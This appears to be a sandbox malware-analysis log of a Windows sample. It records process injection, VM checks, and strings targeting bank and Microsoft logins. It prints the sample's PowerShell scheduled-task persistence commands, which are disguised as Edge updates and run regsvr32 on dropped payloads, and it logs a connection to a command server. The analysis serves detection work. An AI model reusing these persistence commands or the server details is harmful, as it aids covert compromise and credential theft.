                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\regsvr32.exeMemory allocated: E50000 memory reserve | memory write watchJump to behavior
                        Source: C:\Windows\System32\regsvr32.exeMemory allocated: 1B120000 memory reserve | memory write watchJump to behavior
                        Source: C:\Windows\System32\regsvr32.exeMemory allocated: 910000 memory reserve | memory write watch
                        Source: C:\Windows\System32\regsvr32.exeMemory allocated: 1A340000 memory reserve | memory write watch
                        Source: C:\Windows\System32\dllhost.exeCode function: GetAdaptersInfo,15_2_000002913DF12AC4
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4880Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4961Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6429Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3194Jump to behavior
                        Source: C:\Users\user\Desktop\utox_x86_x64.exeWindow / User API: threadDelayed 376Jump to behavior
                        Source: C:\Users\user\Desktop\utox_x86_x64.exeWindow / User API: threadDelayed 3434Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6959
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2672
                        Source: C:\Windows\System32\regsvr32.exeWindow / User API: threadDelayed 3130
                        Source: C:\Windows\System32\regsvr32.exeWindow / User API: threadDelayed 6728
                        Source: C:\Windows\System32\rekeywiz.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\oSyU.iniJump to dropped file
                        Source: C:\Users\Public\ajbs50ul.batDropped PE file which has not been started: C:\Users\user\AppData\Roaming\4smg.iniJump to dropped file
                        Source: C:\Windows\System32\regsvr32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                        Source: C:\Users\Public\ajbs50ul.batAPI coverage: 1.4 %
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6752Thread sleep time: -11068046444225724s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2340Thread sleep count: 6429 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2340Thread sleep count: 3194 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1912Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                        Source: C:\Windows\System32\regsvr32.exe TID: 5468Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\utox_x86_x64.exe TID: 1732Thread sleep time: -63600s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\utox_x86_x64.exe TID: 1732Thread sleep time: -686800s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8Thread sleep count: 6959 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8Thread sleep count: 2672 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2000Thread sleep time: -3689348814741908s >= -30000s
                        Source: C:\Windows\System32\regsvr32.exe TID: 6432Thread sleep time: -30000s >= -30000s
                        Source: C:\Windows\System32\regsvr32.exe TID: 6764Thread sleep count: 3130 > 30
                        Source: C:\Windows\System32\regsvr32.exe TID: 6764Thread sleep count: 6728 > 30
                        Source: C:\Windows\System32\regsvr32.exe TID: 3700Thread sleep time: -27670116110564310s >= -30000s
                        Source: C:\Windows\System32\OpenWith.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\System32\OpenWith.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\System32\regsvr32.exeFile Volume queried: C:\ FullSizeInformation
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E9440F0 memcpy,memcpy,memset,FindFirstFileW,memcpy,GetLastError,FindClose,GetLastError,3_2_00007FF79E9440F0
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 14_2_00000203FE6C22D0 GetSystemInfo,VirtualAlloc,14_2_00000203FE6C22D0
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                        Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                        Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                        Source: powershell.exe, 00000004.00000002.1441747026.000001D89839A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
                        Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
                        Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
                        Source: OpenWith.exe, 0000000B.00000003.1627826487.000001BD88044000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}SymbolicLinkmbolicLinkSymbolicLink
                        Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
                        Source: OpenWith.exe, 0000000B.00000003.1627826487.000001BD88044000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}SymbolicLinkLinkcLinkSymbolicLink
                        Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696492231s
                        Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                        Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696492231
                        Source: OpenWith.exe, 0000000B.00000003.1594021561.000001BD8757A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}SymbolicLinkymbolicLinkcLinkSymbolicLinkA
                        Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696492231
                        Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                        Source: powershell.exe, 00000001.00000002.1553292127.0000018C26262000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                        Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                        Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                        Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696492231t
                        Source: powershell.exe, 00000004.00000002.1441747026.000001D89839A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
                        Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                        Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696492231f
                        Source: utox_x86_x64.exe, 00000008.00000002.2596384232.0000000000D0F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696492231
                        Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696492231j
                        Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
                        Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                        Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696492231x
                        Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                        Source: powershell.exe, 00000004.00000002.1441747026.000001D89839A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
                        Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696492231o
                        Source: OpenWith.exe, 0000000B.00000003.1511290183.000001BD87830000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DisableGuestVmNetworkConnectivity
                        Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
                        Source: OpenWith.exe, 0000000B.00000003.1635909346.000001BD88049000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Prod_VMware_SATA_CD00#4&224f42ef&0&0
                        Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                        Source: OpenWith.exe, 0000000B.00000003.1511290183.000001BD87830000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: EnableGuestVmNetworkConnectivity
                        Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                        Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696492231
                        Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696492231t
                        Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                        Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                        Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E942CF0 GetProcessHeap,HeapAlloc,3_2_00007FF79E942CF0
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E8F1180 Sleep,Sleep,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_initterm,3_2_00007FF79E8F1180
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79EACBC00 SetUnhandledExceptionFilter,3_2_00007FF79EACBC00
                        Source: C:\Users\Public\ajbs50ul.batMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        System process connects to network (likely due to code injection or exploit)
                        Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 185.196.9.174 7777
                        Yara detected Powershell download and execute
                        Source: Yara matchFile source: amsi64_5884.amsi.csv, type: OTHER
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5884, type: MEMORYSTR
                        .NET source code references suspicious native API functions
                        Source: 7.2.regsvr32.exe.2f20000.1.raw.unpack, Flutter.csReference to suspicious API methods: VirtualAlloc(IntPtr.Zero, new IntPtr(65536), MEM_COMMIT, 4u)
                        Source: 7.2.regsvr32.exe.2f20000.1.raw.unpack, Flutter.csReference to suspicious API methods: Marshal.WriteIntPtr(new IntPtr(intPtr.ToInt64() + num), GetProcAddress(moduleHandle, array[i]))
                        Source: 7.2.regsvr32.exe.2f20000.1.raw.unpack, Flutter.csReference to suspicious API methods: VirtualProtect(intPtr, 65536u, 64u, out var _)
                        Allocates memory in foreign processes
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 2913DF10000 protect: page read and write
                        Found direct / indirect Syscall (likely to bypass EDR)
                        Source: C:\Users\Public\ajbs50ul.batNtWriteFile: Indirect: 0x7FF79E947076Jump to behavior
                        Sets debug register (to hijack the execution of another thread)
                        Source: C:\Windows\System32\regsvr32.exeThread register set: 1316 5Jump to behavior
                        Writes to foreign memory regions
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeMemory written: C:\Windows\System32\dllhost.exe base: 2913DF10000
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeMemory written: C:\Windows\System32\dllhost.exe base: 7FF7D87314E0
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\Public\ajbs50ul.bat "C:\Users\Public\ajbs50ul.bat" Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\Desktop\utox_x86_x64.exe "C:\Users\user\Desktop\utox_x86_x64.exe" Jump to behavior
                        Source: C:\Users\Public\ajbs50ul.batProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/s /i:INSTALL C:\Users\user\AppData/Roaming/4smg.ini\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{C804C8C0-8CC0-4804-C048-00888CC0048C}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries)"Jump to behavior
                        Source: C:\Users\Public\ajbs50ul.batProcess created: C:\Windows\System32\regsvr32.exe "regsvr32" /s /i:INSTALL C:\Users\user\AppData/Roaming/4smg.iniJump to behavior
                        Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\OpenWith.exe "C:\Windows\system32\openwith.exe"Jump to behavior
                        Source: C:\Windows\System32\OpenWith.exeProcess created: C:\Program Files\Windows Media Player\wmpnscfg.exe "C:\Program Files\Windows Media Player\wmpnscfg.exe"Jump to behavior
                        Source: C:\Windows\System32\OpenWith.exeProcess created: C:\Windows\System32\rekeywiz.exe "C:\Windows\system32\rekeywiz.exe"Jump to behavior
                        Source: C:\Windows\System32\OpenWith.exeProcess created: C:\Windows\System32\rekeywiz.exe "C:\Windows\system32\rekeywiz.exe"Jump to behavior
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeProcess created: C:\Windows\System32\dllhost.exe "C:\Windows\system32\dllhost.exe"
                        Source: C:\Windows\System32\rekeywiz.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/s /i:INSTALL C:\Users\user\AppData/Roaming/oSyU.ini\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{848CC004-CC00-4888-C000-44488CCC0488}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries)"
                        Source: C:\Windows\System32\rekeywiz.exeProcess created: C:\Windows\System32\regsvr32.exe "regsvr32" /s /i:INSTALL C:\Users\user\AppData/Roaming/oSyU.ini
                        Source: C:\Users\Public\ajbs50ul.batProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "register-scheduledtask -action (new-scheduledtaskaction -execute \"regsvr32\" -argument \"/s /i:install c:\users\user\appdata/roaming/4smg.ini\") -trigger (new-scheduledtasktrigger -once -at (get-date).addminutes(1) -repetitioninterval (new-timespan -minutes 1)) -taskname 'microsoftedgeupdatetaskmachineua{c804c8c0-8cc0-4804-c048-00888cc0048c}' -description 'default' -settings (new-scheduledtasksettingsset -allowstartifonbatteries -dontstopifgoingonbatteries)"
                        Source: C:\Windows\System32\rekeywiz.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "register-scheduledtask -action (new-scheduledtaskaction -execute \"regsvr32\" -argument \"/s /i:install c:\users\user\appdata/roaming/osyu.ini\") -trigger (new-scheduledtasktrigger -once -at (get-date).addminutes(1) -repetitioninterval (new-timespan -minutes 1)) -taskname 'microsoftedgeupdatetaskmachineua{848cc004-cc00-4888-c000-44488ccc0488}' -description 'default' -settings (new-scheduledtasksettingsset -allowstartifonbatteries -dontstopifgoingonbatteries)"
                        Source: C:\Users\Public\ajbs50ul.batProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "register-scheduledtask -action (new-scheduledtaskaction -execute \"regsvr32\" -argument \"/s /i:install c:\users\user\appdata/roaming/4smg.ini\") -trigger (new-scheduledtasktrigger -once -at (get-date).addminutes(1) -repetitioninterval (new-timespan -minutes 1)) -taskname 'microsoftedgeupdatetaskmachineua{c804c8c0-8cc0-4804-c048-00888cc0048c}' -description 'default' -settings (new-scheduledtasksettingsset -allowstartifonbatteries -dontstopifgoingonbatteries)"Jump to behavior
                        Source: C:\Windows\System32\rekeywiz.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "register-scheduledtask -action (new-scheduledtaskaction -execute \"regsvr32\" -argument \"/s /i:install c:\users\user\appdata/roaming/osyu.ini\") -trigger (new-scheduledtasktrigger -once -at (get-date).addminutes(1) -repetitioninterval (new-timespan -minutes 1)) -taskname 'microsoftedgeupdatetaskmachineua{848cc004-cc00-4888-c000-44488ccc0488}' -description 'default' -settings (new-scheduledtasksettingsset -allowstartifonbatteries -dontstopifgoingonbatteries)"
                        Source: C:\Windows\System32\OpenWith.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
